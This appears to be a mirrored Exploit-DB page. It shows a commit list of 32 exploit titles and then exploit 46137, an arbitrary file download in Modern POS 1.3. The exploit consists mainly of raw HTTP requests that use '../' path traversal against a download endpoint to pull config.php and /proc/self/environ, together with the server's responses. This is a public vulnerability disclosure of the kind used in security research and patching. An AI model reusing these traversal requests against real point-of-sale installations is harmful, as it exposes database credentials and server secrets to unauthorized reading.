bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/46137.txt
Offensive Security 518c704a2f DB: 2019-01-15 
32 changes to exploits/shellcodes

xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)
Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation
Microsoft Windows 10 - SSPI Network Authentication Session 0 Privilege Escalation
Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Open Privilege Escalation
Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Delete Privilege Escalation
Microsoft Windows 10 - DSSVC CanonicalAndValidateFilePath Security Feature Bypass
Microsoft Windows 10 - DSSVC MoveFileInheritSecurity Privilege Escalation
Microsoft Windows 10 - Browser Broker Cross Session Privilege Escalation
Microsoft Windows 10 - COM Desktop Broker Privilege Escalation

Hootoo HT-05 - Remote Code Execution (Metasploit)
Across DR-810 ROM-0 - Backup File Disclosure
i-doit CMDB 1.12 - Arbitrary File Download
i-doit CMDB 1.12 - SQL Injection
Horde Imp - 'imap_open' Remote Command Execution
Modern POS 1.3 - Arbitrary File Download
Modern POS 1.3 - SQL Injection
Twilio WEB To Fax Machine System Application 1.0 - SQL Injection
Live Call Support Widget 1.5 - Cross-Site Request Forgery (Add Admin)
Live Call Support Widget 1.5 - Remote Code Execution / SQL Injection
Craigs Classified Ads CMS Theme 1.0.2 - SQL Injection
Find a Place CMS Directory 1.5 - SQL Injection
Cleanto 5.0 - SQL Injection
Lenovo R2105 - Cross-Site Request Forgery (Command Execution)
HealthNode Hospital Management System 1.0 - SQL Injection
Hucart CMS 5.7.4 - Cross-Site Request Forgery (Add Administrator Account)
ThinkPHP 5.X - Remote Command Execution
Real Estate Custom Script 2.0 - SQL Injection
Job Portal Platform 1.0 - SQL Injection
Umbraco CMS 7.12.4 - Authenticated Remote Code Execution
Bigcart - Ecommerce Multivendor System 1.0 - SQL Injection
Portier Vision 4.4.4.2 / 4.4.4.6 - SQL Injection
AudioCode 400HD - Command Injection
2019-01-15 05:01:52 +00:00

55 lines
No EOL
2.1 KiB
Text
Raw Blame History

# Exploit Title: Modern POS 1.3 - Arbitrary File Download
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://itsolution24.com/
# Software Link: https://codecanyon.net/item/modern-pos-point-of-sale-with-stock-management-system/22702683
# Version: 1.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/_inc/bridges/php-local/index.php?action=download&path=[FILE]
#
GET /[PATH]/_inc/bridges/php-local/index.php?action=download&path=../../../config.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=074b581c124d1caf5df3477995946ea8; cpsession=%3aRoGDGcVEun7oqKs9%2c4760d80be71792470b1f6ebfd8f4c0a5; timezone=Asia/Baghdad
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sat, 12 Jan 2019 23:29:12 GMT
Server: Apache
X-Powered-By: PHP/7.2.13
Content-Disposition: attachment; filename="config.php"
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 2920
Content-Type: text/x-php;charset=UTF-8
GET /[PATH]/_inc/bridges/php-local/index.php?action=download&path=../../../../../../../../proc/self/environ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=074b581c124d1caf5df3477995946ea8; cpsession=%3aRoGDGcVEun7oqKs9%2c4760d80be71792470b1f6ebfd8f4c0a5; timezone=Asia/Baghdad
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sat, 12 Jan 2019 23:34:27 GMT
Server: Apache
X-Powered-By: PHP/7.2.13
Content-Disposition: attachment; filename="environ"
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 0
Content-Type: inode/x-empty
Reference in a new issue View git blame Copy permalink